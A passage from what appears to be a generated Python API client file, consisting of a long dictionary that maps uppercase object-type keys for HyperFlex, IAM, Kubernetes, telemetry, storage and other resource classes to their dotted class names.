'HYPERFLEX.APPCATALOG': "hyperflex.AppCatalog",
'HYPERFLEX.AUTOSUPPORTPOLICY': "hyperflex.AutoSupportPolicy",
'HYPERFLEX.BACKUPCLUSTER': "hyperflex.BackupCluster",
'HYPERFLEX.CAPABILITYINFO': "hyperflex.CapabilityInfo",
'HYPERFLEX.CLUSTER': "hyperflex.Cluster",
'HYPERFLEX.CLUSTERBACKUPPOLICY': "hyperflex.ClusterBackupPolicy",
'HYPERFLEX.CLUSTERBACKUPPOLICYDEPLOYMENT': "hyperflex.ClusterBackupPolicyDeployment",
'HYPERFLEX.CLUSTERBACKUPPOLICYINVENTORY': "hyperflex.ClusterBackupPolicyInventory",
'HYPERFLEX.CLUSTERHEALTHCHECKEXECUTIONSNAPSHOT': "hyperflex.ClusterHealthCheckExecutionSnapshot",
'HYPERFLEX.CLUSTERNETWORKPOLICY': "hyperflex.ClusterNetworkPolicy",
'HYPERFLEX.CLUSTERPROFILE': "hyperflex.ClusterProfile",
'HYPERFLEX.CLUSTERREPLICATIONNETWORKPOLICY': "hyperflex.ClusterReplicationNetworkPolicy",
'HYPERFLEX.CLUSTERREPLICATIONNETWORKPOLICYDEPLOYMENT': "hyperflex.ClusterReplicationNetworkPolicyDeployment",
'HYPERFLEX.CLUSTERSTORAGEPOLICY': "hyperflex.ClusterStoragePolicy",
'HYPERFLEX.CONFIGRESULT': "hyperflex.ConfigResult",
'HYPERFLEX.CONFIGRESULTENTRY': "hyperflex.ConfigResultEntry",
'HYPERFLEX.DATAPROTECTIONPEER': "hyperflex.DataProtectionPeer",
'HYPERFLEX.DATASTORESTATISTIC': "hyperflex.DatastoreStatistic",
'HYPERFLEX.DEVICEPACKAGEDOWNLOADSTATE': "hyperflex.DevicePackageDownloadState",
'HYPERFLEX.DRIVE': "hyperflex.Drive",
'HYPERFLEX.EXTFCSTORAGEPOLICY': "hyperflex.ExtFcStoragePolicy",
'HYPERFLEX.EXTISCSISTORAGEPOLICY': "hyperflex.ExtIscsiStoragePolicy",
'HYPERFLEX.FEATURELIMITEXTERNAL': "hyperflex.FeatureLimitExternal",
'HYPERFLEX.FEATURELIMITINTERNAL': "hyperflex.FeatureLimitInternal",
'HYPERFLEX.HEALTH': "hyperflex.Health",
'HYPERFLEX.HEALTHCHECKDEFINITION': "hyperflex.HealthCheckDefinition",
'HYPERFLEX.HEALTHCHECKEXECUTION': "hyperflex.HealthCheckExecution",
'HYPERFLEX.HEALTHCHECKEXECUTIONSNAPSHOT': "hyperflex.HealthCheckExecutionSnapshot",
'HYPERFLEX.HEALTHCHECKPACKAGECHECKSUM': "hyperflex.HealthCheckPackageChecksum",
'HYPERFLEX.HXDPVERSION': "hyperflex.HxdpVersion",
'HYPERFLEX.LICENSE': "hyperflex.License",
'HYPERFLEX.LOCALCREDENTIALPOLICY': "hyperflex.LocalCredentialPolicy",
'HYPERFLEX.NODE': "hyperflex.Node",
'HYPERFLEX.NODECONFIGPOLICY': "hyperflex.NodeConfigPolicy",
'HYPERFLEX.NODEPROFILE': "hyperflex.NodeProfile",
'HYPERFLEX.PROTECTEDCLUSTER': "hyperflex.ProtectedCluster",
'HYPERFLEX.PROXYSETTINGPOLICY': "hyperflex.ProxySettingPolicy",
'HYPERFLEX.SERVERFIRMWAREVERSION': "hyperflex.ServerFirmwareVersion",
'HYPERFLEX.SERVERFIRMWAREVERSIONENTRY': "hyperflex.ServerFirmwareVersionEntry",
'HYPERFLEX.SERVERMODEL': "hyperflex.ServerModel",
'HYPERFLEX.SERVICEAUTHTOKEN': "hyperflex.ServiceAuthToken",
'HYPERFLEX.SOFTWAREDISTRIBUTIONCOMPONENT': "hyperflex.SoftwareDistributionComponent",
'HYPERFLEX.SOFTWAREDISTRIBUTIONENTRY': "hyperflex.SoftwareDistributionEntry",
'HYPERFLEX.SOFTWAREDISTRIBUTIONVERSION': "hyperflex.SoftwareDistributionVersion",
'HYPERFLEX.SOFTWAREVERSIONPOLICY': "hyperflex.SoftwareVersionPolicy",
'HYPERFLEX.STORAGECONTAINER': "hyperflex.StorageContainer",
'HYPERFLEX.SYSCONFIGPOLICY': "hyperflex.SysConfigPolicy",
'HYPERFLEX.UCSMCONFIGPOLICY': "hyperflex.UcsmConfigPolicy",
'HYPERFLEX.VCENTERCONFIGPOLICY': "hyperflex.VcenterConfigPolicy",
'HYPERFLEX.VMBACKUPINFO': "hyperflex.VmBackupInfo",
'HYPERFLEX.VMIMPORTOPERATION': "hyperflex.VmImportOperation",
'HYPERFLEX.VMRESTOREOPERATION': "hyperflex.VmRestoreOperation",
'HYPERFLEX.VMSNAPSHOTINFO': "hyperflex.VmSnapshotInfo",
'HYPERFLEX.VOLUME': "hyperflex.Volume",
'HYPERFLEX.WITNESSCONFIGURATION': "hyperflex.WitnessConfiguration",
'IAAS.CONNECTORPACK': "iaas.ConnectorPack",
'IAAS.DEVICESTATUS': "iaas.DeviceStatus",
'IAAS.DIAGNOSTICMESSAGES': "iaas.DiagnosticMessages",
'IAAS.LICENSEINFO': "iaas.LicenseInfo",
'IAAS.MOSTRUNTASKS': "iaas.MostRunTasks",
'IAAS.SERVICEREQUEST': "iaas.ServiceRequest",
'IAAS.UCSDINFO': "iaas.UcsdInfo",
'IAAS.UCSDMANAGEDINFRA': "iaas.UcsdManagedInfra",
'IAAS.UCSDMESSAGES': "iaas.UcsdMessages",
'IAM.ACCOUNT': "iam.Account",
'IAM.ACCOUNTEXPERIENCE': "iam.AccountExperience",
'IAM.APIKEY': "iam.ApiKey",
'IAM.APPREGISTRATION': "iam.AppRegistration",
'IAM.BANNERMESSAGE': "iam.BannerMessage",
'IAM.CERTIFICATE': "iam.Certificate",
'IAM.CERTIFICATEREQUEST': "iam.CertificateRequest",
'IAM.DOMAINGROUP': "iam.DomainGroup",
'IAM.ENDPOINTPRIVILEGE': "iam.EndPointPrivilege",
'IAM.ENDPOINTROLE': "iam.EndPointRole",
'IAM.ENDPOINTUSER': "iam.EndPointUser",
'IAM.ENDPOINTUSERPOLICY': "iam.EndPointUserPolicy",
'IAM.ENDPOINTUSERROLE': "iam.EndPointUserRole",
'IAM.IDP': "iam.Idp",
'IAM.IDPREFERENCE': "iam.IdpReference",
'IAM.IPACCESSMANAGEMENT': "iam.IpAccessManagement",
'IAM.IPADDRESS': "iam.IpAddress",
'IAM.LDAPGROUP': "iam.LdapGroup",
'IAM.LDAPPOLICY': "iam.LdapPolicy",
'IAM.LDAPPROVIDER': "iam.LdapProvider",
'IAM.LOCALUSERPASSWORD': "iam.LocalUserPassword",
'IAM.LOCALUSERPASSWORDPOLICY': "iam.LocalUserPasswordPolicy",
'IAM.OAUTHTOKEN': "iam.OAuthToken",
'IAM.PERMISSION': "iam.Permission",
'IAM.PRIVATEKEYSPEC': "iam.PrivateKeySpec",
'IAM.PRIVILEGE': "iam.Privilege",
'IAM.PRIVILEGESET': "iam.PrivilegeSet",
'IAM.QUALIFIER': "iam.Qualifier",
'IAM.RESOURCELIMITS': "iam.ResourceLimits",
'IAM.RESOURCEPERMISSION': "iam.ResourcePermission",
'IAM.RESOURCEROLES': "iam.ResourceRoles",
'IAM.ROLE': "iam.Role",
'IAM.SECURITYHOLDER': "iam.SecurityHolder",
'IAM.SERVICEPROVIDER': "iam.ServiceProvider",
'IAM.SESSION': "iam.Session",
'IAM.SESSIONLIMITS': "iam.SessionLimits",
'IAM.SYSTEM': "iam.System",
'IAM.TRUSTPOINT': "iam.TrustPoint",
'IAM.USER': "iam.User",
'IAM.USERGROUP': "iam.UserGroup",
'IAM.USERPREFERENCE': "iam.UserPreference",
'INVENTORY.DEVICEINFO': "inventory.DeviceInfo",
'INVENTORY.DNMOBINDING': "inventory.DnMoBinding",
'INVENTORY.GENERICINVENTORY': "inventory.GenericInventory",
'INVENTORY.GENERICINVENTORYHOLDER': "inventory.GenericInventoryHolder",
'INVENTORY.REQUEST': "inventory.Request",
'IPMIOVERLAN.POLICY': "ipmioverlan.Policy",
'IPPOOL.BLOCKLEASE': "ippool.BlockLease",
'IPPOOL.IPLEASE': "ippool.IpLease",
'IPPOOL.POOL': "ippool.Pool",
'IPPOOL.POOLMEMBER': "ippool.PoolMember",
'IPPOOL.SHADOWBLOCK': "ippool.ShadowBlock",
'IPPOOL.SHADOWPOOL': "ippool.ShadowPool",
'IPPOOL.UNIVERSE': "ippool.Universe",
'IQNPOOL.BLOCK': "iqnpool.Block",
'IQNPOOL.LEASE': "iqnpool.Lease",
'IQNPOOL.POOL': "iqnpool.Pool",
'IQNPOOL.POOLMEMBER': "iqnpool.PoolMember",
'IQNPOOL.UNIVERSE': "iqnpool.Universe",
'IWOTENANT.TENANTSTATUS': "iwotenant.TenantStatus",
'KUBERNETES.ACICNIAPIC': "kubernetes.AciCniApic",
'KUBERNETES.ACICNIPROFILE': "kubernetes.AciCniProfile",
'KUBERNETES.ACICNITENANTCLUSTERALLOCATION': "kubernetes.AciCniTenantClusterAllocation",
'KUBERNETES.ADDONDEFINITION': "kubernetes.AddonDefinition",
'KUBERNETES.ADDONPOLICY': "kubernetes.AddonPolicy",
'KUBERNETES.ADDONREPOSITORY': "kubernetes.AddonRepository",
'KUBERNETES.BAREMETALNODEPROFILE': "kubernetes.BaremetalNodeProfile",
'KUBERNETES.CATALOG': "kubernetes.Catalog",
'KUBERNETES.CLUSTER': "kubernetes.Cluster",
'KUBERNETES.CLUSTERADDONPROFILE': "kubernetes.ClusterAddonProfile",
'KUBERNETES.CLUSTERPROFILE': "kubernetes.ClusterProfile",
'KUBERNETES.CONFIGRESULT': "kubernetes.ConfigResult",
'KUBERNETES.CONFIGRESULTENTRY': "kubernetes.ConfigResultEntry",
'KUBERNETES.CONTAINERRUNTIMEPOLICY': "kubernetes.ContainerRuntimePolicy",
'KUBERNETES.DAEMONSET': "kubernetes.DaemonSet",
'KUBERNETES.DEPLOYMENT': "kubernetes.Deployment",
'KUBERNETES.INGRESS': "kubernetes.Ingress",
'KUBERNETES.NETWORKPOLICY': "kubernetes.NetworkPolicy",
'KUBERNETES.NODE': "kubernetes.Node",
'KUBERNETES.NODEGROUPPROFILE': "kubernetes.NodeGroupProfile",
'KUBERNETES.POD': "kubernetes.Pod",
'KUBERNETES.SERVICE': "kubernetes.Service",
'KUBERNETES.STATEFULSET': "kubernetes.StatefulSet",
'KUBERNETES.SYSCONFIGPOLICY': "kubernetes.SysConfigPolicy",
'KUBERNETES.TRUSTEDREGISTRIESPOLICY': "kubernetes.TrustedRegistriesPolicy",
'KUBERNETES.VERSION': "kubernetes.Version",
'KUBERNETES.VERSIONPOLICY': "kubernetes.VersionPolicy",
'KUBERNETES.VIRTUALMACHINEINFRACONFIGPOLICY': "kubernetes.VirtualMachineInfraConfigPolicy",
'KUBERNETES.VIRTUALMACHINEINFRASTRUCTUREPROVIDER': "kubernetes.VirtualMachineInfrastructureProvider",
'KUBERNETES.VIRTUALMACHINEINSTANCETYPE': "kubernetes.VirtualMachineInstanceType",
'KUBERNETES.VIRTUALMACHINENODEPROFILE': "kubernetes.VirtualMachineNodeProfile",
'KVM.POLICY': "kvm.Policy",
'KVM.SESSION': "kvm.Session",
'KVM.TUNNEL': "kvm.Tunnel",
'LICENSE.ACCOUNTLICENSEDATA': "license.AccountLicenseData",
'LICENSE.CUSTOMEROP': "license.CustomerOp",
'LICENSE.IKSCUSTOMEROP': "license.IksCustomerOp",
'LICENSE.IKSLICENSECOUNT': "license.IksLicenseCount",
'LICENSE.IWOCUSTOMEROP': "license.IwoCustomerOp",
'LICENSE.IWOLICENSECOUNT': "license.IwoLicenseCount",
'LICENSE.LICENSEINFO': "license.LicenseInfo",
'LICENSE.LICENSERESERVATIONOP': "license.LicenseReservationOp",
'LICENSE.SMARTLICENSETOKEN': "license.SmartlicenseToken",
'LS.SERVICEPROFILE': "ls.ServiceProfile",
'MACPOOL.IDBLOCK': "macpool.IdBlock",
'MACPOOL.LEASE': "macpool.Lease",
'MACPOOL.POOL': "macpool.Pool",
'MACPOOL.POOLMEMBER': "macpool.PoolMember",
'MACPOOL.UNIVERSE': "macpool.Universe",
'MANAGEMENT.CONTROLLER': "management.Controller",
'MANAGEMENT.ENTITY': "management.Entity",
'MANAGEMENT.INTERFACE': "management.Interface",
'MEMORY.ARRAY': "memory.Array",
'MEMORY.PERSISTENTMEMORYCONFIGRESULT': "memory.PersistentMemoryConfigResult",
'MEMORY.PERSISTENTMEMORYCONFIGURATION': "memory.PersistentMemoryConfiguration",
'MEMORY.PERSISTENTMEMORYNAMESPACE': "memory.PersistentMemoryNamespace",
'MEMORY.PERSISTENTMEMORYNAMESPACECONFIGRESULT': "memory.PersistentMemoryNamespaceConfigResult",
'MEMORY.PERSISTENTMEMORYPOLICY': "memory.PersistentMemoryPolicy",
'MEMORY.PERSISTENTMEMORYREGION': "memory.PersistentMemoryRegion",
'MEMORY.PERSISTENTMEMORYUNIT': "memory.PersistentMemoryUnit",
'MEMORY.UNIT': "memory.Unit",
'META.DEFINITION': "meta.Definition",
'NETWORK.ELEMENT': "network.Element",
'NETWORK.ELEMENTSUMMARY': "network.ElementSummary",
'NETWORK.FCZONEINFO': "network.FcZoneInfo",
'NETWORK.VLANPORTINFO': "network.VlanPortInfo",
'NETWORKCONFIG.POLICY': "networkconfig.Policy",
'NIAAPI.APICCCOPOST': "niaapi.ApicCcoPost",
'NIAAPI.APICFIELDNOTICE': "niaapi.ApicFieldNotice",
'NIAAPI.APICHWEOL': "niaapi.ApicHweol",
'NIAAPI.APICLATESTMAINTAINEDRELEASE': "niaapi.ApicLatestMaintainedRelease",
'NIAAPI.APICRELEASERECOMMEND': "niaapi.ApicReleaseRecommend",
'NIAAPI.APICSWEOL': "niaapi.ApicSweol",
'NIAAPI.DCNMCCOPOST': "niaapi.DcnmCcoPost",
'NIAAPI.DCNMFIELDNOTICE': "niaapi.DcnmFieldNotice",
'NIAAPI.DCNMHWEOL': "niaapi.DcnmHweol",
'NIAAPI.DCNMLATESTMAINTAINEDRELEASE': "niaapi.DcnmLatestMaintainedRelease",
'NIAAPI.DCNMRELEASERECOMMEND': "niaapi.DcnmReleaseRecommend",
'NIAAPI.DCNMSWEOL': "niaapi.DcnmSweol",
'NIAAPI.FILEDOWNLOADER': "niaapi.FileDownloader",
'NIAAPI.NIAMETADATA': "niaapi.NiaMetadata",
'NIAAPI.NIBFILEDOWNLOADER': "niaapi.NibFileDownloader",
'NIAAPI.NIBMETADATA': "niaapi.NibMetadata",
'NIAAPI.VERSIONREGEX': "niaapi.VersionRegex",
'NIATELEMETRY.AAALDAPPROVIDERDETAILS': "niatelemetry.AaaLdapProviderDetails",
'NIATELEMETRY.AAARADIUSPROVIDERDETAILS': "niatelemetry.AaaRadiusProviderDetails",
'NIATELEMETRY.AAATACACSPROVIDERDETAILS': "niatelemetry.AaaTacacsProviderDetails",
'NIATELEMETRY.APICAPPPLUGINDETAILS': "niatelemetry.ApicAppPluginDetails",
'NIATELEMETRY.APICCOREFILEDETAILS': "niatelemetry.ApicCoreFileDetails",
'NIATELEMETRY.APICDBGEXPRSEXPORTDEST': "niatelemetry.ApicDbgexpRsExportDest",
'NIATELEMETRY.APICDBGEXPRSTSSCHEDULER': "niatelemetry.ApicDbgexpRsTsScheduler",
'NIATELEMETRY.APICFANDETAILS': "niatelemetry.ApicFanDetails",
'NIATELEMETRY.APICFEXDETAILS': "niatelemetry.ApicFexDetails",
'NIATELEMETRY.APICFLASHDETAILS': "niatelemetry.ApicFlashDetails",
'NIATELEMETRY.APICNTPAUTH': "niatelemetry.ApicNtpAuth",
'NIATELEMETRY.APICPSUDETAILS': "niatelemetry.ApicPsuDetails",
'NIATELEMETRY.APICREALMDETAILS': "niatelemetry.ApicRealmDetails",
'NIATELEMETRY.APICSNMPCLIENTGRPDETAILS': "niatelemetry.ApicSnmpClientGrpDetails",
'NIATELEMETRY.APICSNMPCOMMUNITYACCESSDETAILS': "niatelemetry.ApicSnmpCommunityAccessDetails",
'NIATELEMETRY.APICSNMPCOMMUNITYDETAILS': "niatelemetry.ApicSnmpCommunityDetails",
'NIATELEMETRY.APICSNMPTRAPDETAILS': "niatelemetry.ApicSnmpTrapDetails",
'NIATELEMETRY.APICSNMPTRAPFWDSERVERDETAILS': "niatelemetry.ApicSnmpTrapFwdServerDetails",
'NIATELEMETRY.APICSNMPVERSIONTHREEDETAILS': "niatelemetry.ApicSnmpVersionThreeDetails",
'NIATELEMETRY.APICSYSLOGGRP': "niatelemetry.ApicSysLogGrp",
'NIATELEMETRY.APICSYSLOGSRC': "niatelemetry.ApicSysLogSrc",
'NIATELEMETRY.APICTRANSCEIVERDETAILS': "niatelemetry.ApicTransceiverDetails",
'NIATELEMETRY.APICUIPAGECOUNTS': "niatelemetry.ApicUiPageCounts",
'NIATELEMETRY.APPDETAILS': "niatelemetry.AppDetails",
'NIATELEMETRY.COMMONPOLICIES': "niatelemetry.CommonPolicies",
'NIATELEMETRY.DCNMFANDETAILS': "niatelemetry.DcnmFanDetails",
'NIATELEMETRY.DCNMFEXDETAILS': "niatelemetry.DcnmFexDetails",
'NIATELEMETRY.DCNMMODULEDETAILS': "niatelemetry.DcnmModuleDetails",
'NIATELEMETRY.DCNMPSUDETAILS': "niatelemetry.DcnmPsuDetails",
'NIATELEMETRY.DCNMTRANSCEIVERDETAILS': "niatelemetry.DcnmTransceiverDetails",
'NIATELEMETRY.EPG': "niatelemetry.Epg",
'NIATELEMETRY.FABRICMODULEDETAILS': "niatelemetry.FabricModuleDetails",
'NIATELEMETRY.FABRICPODPROFILE': "niatelemetry.FabricPodProfile",
'NIATELEMETRY.FABRICPODSS': "niatelemetry.FabricPodSs",
'NIATELEMETRY.FAULT': "niatelemetry.Fault",
'NIATELEMETRY.HTTPSACLCONTRACTDETAILS': "niatelemetry.HttpsAclContractDetails",
'NIATELEMETRY.HTTPSACLCONTRACTFILTERMAP': "niatelemetry.HttpsAclContractFilterMap",
'NIATELEMETRY.HTTPSACLEPGCONTRACTMAP': "niatelemetry.HttpsAclEpgContractMap",
'NIATELEMETRY.HTTPSACLEPGDETAILS': "niatelemetry.HttpsAclEpgDetails",
'NIATELEMETRY.HTTPSACLFILTERDETAILS': "niatelemetry.HttpsAclFilterDetails",
'NIATELEMETRY.LC': "niatelemetry.Lc",
'NIATELEMETRY.MSOCONTRACTDETAILS': "niatelemetry.MsoContractDetails",
'NIATELEMETRY.MSOEPGDETAILS': "niatelemetry.MsoEpgDetails",
'NIATELEMETRY.MSOSCHEMADETAILS': "niatelemetry.MsoSchemaDetails",
'NIATELEMETRY.MSOSITEDETAILS': "niatelemetry.MsoSiteDetails",
'NIATELEMETRY.MSOTENANTDETAILS': "niatelemetry.MsoTenantDetails",
'NIATELEMETRY.NEXUSDASHBOARDCONTROLLERDETAILS': "niatelemetry.NexusDashboardControllerDetails",
'NIATELEMETRY.NEXUSDASHBOARDDETAILS': "niatelemetry.NexusDashboardDetails",
'NIATELEMETRY.NEXUSDASHBOARDMEMORYDETAILS': "niatelemetry.NexusDashboardMemoryDetails",
'NIATELEMETRY.NEXUSDASHBOARDS': "niatelemetry.NexusDashboards",
'NIATELEMETRY.NIAFEATUREUSAGE': "niatelemetry.NiaFeatureUsage",
'NIATELEMETRY.NIAINVENTORY': "niatelemetry.NiaInventory",
'NIATELEMETRY.NIAINVENTORYDCNM': "niatelemetry.NiaInventoryDcnm",
'NIATELEMETRY.NIAINVENTORYFABRIC': "niatelemetry.NiaInventoryFabric",
'NIATELEMETRY.NIALICENSESTATE': "niatelemetry.NiaLicenseState",
'NIATELEMETRY.PASSWORDSTRENGTHCHECK': "niatelemetry.PasswordStrengthCheck",
'NIATELEMETRY.PODCOMMPOLICIES': "niatelemetry.PodCommPolicies",
'NIATELEMETRY.PODSNMPPOLICIES': "niatelemetry.PodSnmpPolicies",
'NIATELEMETRY.PODTIMESERVERPOLICIES': "niatelemetry.PodTimeServerPolicies",
'NIATELEMETRY.SITEINVENTORY': "niatelemetry.SiteInventory",
'NIATELEMETRY.SNMPSRC': "niatelemetry.SnmpSrc",
'NIATELEMETRY.SSHVERSIONTWO': "niatelemetry.SshVersionTwo",
'NIATELEMETRY.SUPERVISORMODULEDETAILS': "niatelemetry.SupervisorModuleDetails",
'NIATELEMETRY.SYSLOGREMOTEDEST': "niatelemetry.SyslogRemoteDest",
'NIATELEMETRY.SYSLOGSYSMSG': "niatelemetry.SyslogSysMsg",
'NIATELEMETRY.SYSLOGSYSMSGFACFILTER': "niatelemetry.SyslogSysMsgFacFilter",
'NIATELEMETRY.SYSTEMCONTROLLERDETAILS': "niatelemetry.SystemControllerDetails",
'NIATELEMETRY.TENANT': "niatelemetry.Tenant",
'NOTIFICATION.ACCOUNTSUBSCRIPTION': "notification.AccountSubscription",
'NTP.POLICY': "ntp.Policy",
'OAUTH.ACCESSTOKEN': "oauth.AccessToken",
'OAUTH.AUTHORIZATION': "oauth.Authorization",
'OPRS.DEPLOYMENT': "oprs.Deployment",
'OPRS.SYNCTARGETLISTMESSAGE': "oprs.SyncTargetListMessage",
'ORGANIZATION.ORGANIZATION': "organization.Organization",
'OS.BULKINSTALLINFO': "os.BulkInstallInfo",
'OS.CATALOG': "os.Catalog",
'OS.CONFIGURATIONFILE': "os.ConfigurationFile",
'OS.DISTRIBUTION': "os.Distribution",
'OS.INSTALL': "os.Install",
'OS.OSSUPPORT': "os.OsSupport",
'OS.SUPPORTEDVERSION': "os.SupportedVersion",
'OS.TEMPLATEFILE': "os.TemplateFile",
'OS.VALIDINSTALLTARGET': "os.ValidInstallTarget",
'PCI.COPROCESSORCARD': "pci.CoprocessorCard",
'PCI.DEVICE': "pci.Device",
'PCI.LINK': "pci.Link",
'PCI.SWITCH': "pci.Switch",
'PORT.GROUP': "port.Group",
'PORT.MACBINDING': "port.MacBinding",
'PORT.SUBGROUP': "port.SubGroup",
'POWER.CONTROLSTATE': "power.ControlState",
'POWER.POLICY': "power.Policy",
'PROCESSOR.UNIT': "processor.Unit",
'RACK.UNITPERSONALITY': "rack.UnitPersonality",
'RECOMMENDATION.CAPACITYRUNWAY': "recommendation.CapacityRunway",
'RECOMMENDATION.PHYSICALITEM': "recommendation.PhysicalItem",
'RECOVERY.BACKUPCONFIGPOLICY': "recovery.BackupConfigPolicy",
'RECOVERY.BACKUPPROFILE': "recovery.BackupProfile",
'RECOVERY.CONFIGRESULT': "recovery.ConfigResult",
'RECOVERY.CONFIGRESULTENTRY': "recovery.ConfigResultEntry",
'RECOVERY.ONDEMANDBACKUP': "recovery.OnDemandBackup",
'RECOVERY.RESTORE': "recovery.Restore",
'RECOVERY.SCHEDULECONFIGPOLICY': "recovery.ScheduleConfigPolicy",
'RESOURCE.GROUP': "resource.Group",
'RESOURCE.GROUPMEMBER': "resource.GroupMember",
'RESOURCE.LICENSERESOURCECOUNT': "resource.LicenseResourceCount",
'RESOURCE.MEMBERSHIP': "resource.Membership",
'RESOURCE.MEMBERSHIPHOLDER': "resource.MembershipHolder",
'RESOURCE.RESERVATION': "resource.Reservation",
'RESOURCEPOOL.LEASE': "resourcepool.Lease",
'RESOURCEPOOL.LEASERESOURCE': "resourcepool.LeaseResource",
'RESOURCEPOOL.POOL': "resourcepool.Pool",
'RESOURCEPOOL.POOLMEMBER': "resourcepool.PoolMember",
'RESOURCEPOOL.UNIVERSE': "resourcepool.Universe",
'RPROXY.REVERSEPROXY': "rproxy.ReverseProxy",
'SDCARD.POLICY': "sdcard.Policy",
'SDWAN.PROFILE': "sdwan.Profile",
'SDWAN.ROUTERNODE': "sdwan.RouterNode",
'SDWAN.ROUTERPOLICY': "sdwan.RouterPolicy",
'SDWAN.VMANAGEACCOUNTPOLICY': "sdwan.VmanageAccountPolicy",
'SEARCH.SEARCHITEM': "search.SearchItem",
'SEARCH.TAGITEM': "search.TagItem",
'SECURITY.UNIT': "security.Unit",
'SERVER.CONFIGCHANGEDETAIL': "server.ConfigChangeDetail",
'SERVER.CONFIGIMPORT': "server.ConfigImport",
'SERVER.CONFIGRESULT': "server.ConfigResult",
'SERVER.CONFIGRESULTENTRY': "server.ConfigResultEntry",
'SERVER.PROFILE': "server.Profile",
'SERVER.PROFILETEMPLATE': "server.ProfileTemplate",
'SMTP.POLICY': "smtp.Policy",
'SNMP.POLICY': "snmp.Policy",
'SOFTWARE.APPLIANCEDISTRIBUTABLE': "software.ApplianceDistributable",
'SOFTWARE.DOWNLOADHISTORY': "software.DownloadHistory",
'SOFTWARE.HCLMETA': "software.HclMeta",
'SOFTWARE.HYPERFLEXBUNDLEDISTRIBUTABLE': "software.HyperflexBundleDistributable",
'SOFTWARE.HYPERFLEXDISTRIBUTABLE': "software.HyperflexDistributable",
'SOFTWARE.RELEASEMETA': "software.ReleaseMeta",
'SOFTWARE.SOLUTIONDISTRIBUTABLE': "software.SolutionDistributable",
'SOFTWARE.UCSDBUNDLEDISTRIBUTABLE': "software.UcsdBundleDistributable",
'SOFTWARE.UCSDDISTRIBUTABLE': "software.UcsdDistributable",
'SOFTWAREREPOSITORY.AUTHORIZATION': "softwarerepository.Authorization",
'SOFTWAREREPOSITORY.CACHEDIMAGE': "softwarerepository.CachedImage",
'SOFTWAREREPOSITORY.CATALOG': "softwarerepository.Catalog",
'SOFTWAREREPOSITORY.CATEGORYMAPPER': "softwarerepository.CategoryMapper",
'SOFTWAREREPOSITORY.CATEGORYMAPPERMODEL': "softwarerepository.CategoryMapperModel",
'SOFTWAREREPOSITORY.CATEGORYSUPPORTCONSTRAINT': "softwarerepository.CategorySupportConstraint",
'SOFTWAREREPOSITORY.DOWNLOADSPEC': "softwarerepository.DownloadSpec",
'SOFTWAREREPOSITORY.OPERATINGSYSTEMFILE': "softwarerepository.OperatingSystemFile",
'SOFTWAREREPOSITORY.RELEASE': "softwarerepository.Release",
'SOL.POLICY': "sol.Policy",
'SSH.POLICY': "ssh.Policy",
'STORAGE.CONTROLLER': "storage.Controller",
'STORAGE.DISKGROUP': "storage.DiskGroup",
'STORAGE.DISKSLOT': "storage.DiskSlot",
'STORAGE.DRIVEGROUP': "storage.DriveGroup",
'STORAGE.ENCLOSURE': "storage.Enclosure",
'STORAGE.ENCLOSUREDISK': "storage.EnclosureDisk",
'STORAGE.ENCLOSUREDISKSLOTEP': "storage.EnclosureDiskSlotEp",
'STORAGE.FLEXFLASHCONTROLLER': "storage.FlexFlashController",
'STORAGE.FLEXFLASHCONTROLLERPROPS': "storage.FlexFlashControllerProps",
'STORAGE.FLEXFLASHPHYSICALDRIVE': "storage.FlexFlashPhysicalDrive",
'STORAGE.FLEXFLASHVIRTUALDRIVE': "storage.FlexFlashVirtualDrive",
'STORAGE.FLEXUTILCONTROLLER': "storage.FlexUtilController",
'STORAGE.FLEXUTILPHYSICALDRIVE': "storage.FlexUtilPhysicalDrive",
'STORAGE.FLEXUTILVIRTUALDRIVE': "storage.FlexUtilVirtualDrive",
'STORAGE.HITACHIARRAY': "storage.HitachiArray",
'STORAGE.HITACHICONTROLLER': "storage.HitachiController",
'STORAGE.HITACHIDISK': "storage.HitachiDisk",
'STORAGE.HITACHIHOST': "storage.HitachiHost",
'STORAGE.HITACHIHOSTLUN': "storage.HitachiHostLun",
'STORAGE.HITACHIPARITYGROUP': "storage.HitachiParityGroup",
'STORAGE.HITACHIPOOL': "storage.HitachiPool",
'STORAGE.HITACHIPORT': "storage.HitachiPort",
'STORAGE.HITACHIVOLUME': "storage.HitachiVolume",
'STORAGE.HYPERFLEXSTORAGECONTAINER': "storage.HyperFlexStorageContainer",
'STORAGE.HYPERFLEXVOLUME': "storage.HyperFlexVolume",
'STORAGE.ITEM': "storage.Item",
'STORAGE.NETAPPAGGREGATE': "storage.NetAppAggregate",
'STORAGE.NETAPPBASEDISK': "storage.NetAppBaseDisk",
'STORAGE.NETAPPCLUSTER': "storage.NetAppCluster",
'STORAGE.NETAPPETHERNETPORT': "storage.NetAppEthernetPort",
'STORAGE.NETAPPEXPORTPOLICY': "storage.NetAppExportPolicy",
'STORAGE.NETAPPFCINTERFACE': "storage.NetAppFcInterface",
'STORAGE.NETAPPFCPORT': "storage.NetAppFcPort",
'STORAGE.NETAPPINITIATORGROUP': "storage.NetAppInitiatorGroup",
'STORAGE.NETAPPIPINTERFACE': "storage.NetAppIpInterface",
'STORAGE.NETAPPLICENSE': "storage.NetAppLicense",
'STORAGE.NETAPPLUN': "storage.NetAppLun",
'STORAGE.NETAPPLUNMAP': "storage.NetAppLunMap",
'STORAGE.NETAPPNODE': "storage.NetAppNode",
'STORAGE.NETAPPNTPSERVER': "storage.NetAppNtpServer",
'STORAGE.NETAPPSENSOR': "storage.NetAppSensor",
'STORAGE.NETAPPSTORAGEVM': "storage.NetAppStorageVm",
'STORAGE.NETAPPVOLUME': "storage.NetAppVolume",
'STORAGE.NETAPPVOLUMESNAPSHOT': "storage.NetAppVolumeSnapshot",
'STORAGE.PHYSICALDISK': "storage.PhysicalDisk",
'STORAGE.PHYSICALDISKEXTENSION': "storage.PhysicalDiskExtension",
'STORAGE.PHYSICALDISKUSAGE': "storage.PhysicalDiskUsage",
'STORAGE.PUREARRAY': "storage.PureArray",
'STORAGE.PURECONTROLLER': "storage.PureController",
'STORAGE.PUREDISK': "storage.PureDisk",
'STORAGE.PUREHOST': "storage.PureHost",
'STORAGE.PUREHOSTGROUP': "storage.PureHostGroup",
'STORAGE.PUREHOSTLUN': "storage.PureHostLun",
'STORAGE.PUREPORT': "storage.PurePort",
'STORAGE.PUREPROTECTIONGROUP': "storage.PureProtectionGroup",
'STORAGE.PUREPROTECTIONGROUPSNAPSHOT': "storage.PureProtectionGroupSnapshot",
'STORAGE.PUREREPLICATIONSCHEDULE': "storage.PureReplicationSchedule",
'STORAGE.PURESNAPSHOTSCHEDULE': "storage.PureSnapshotSchedule",
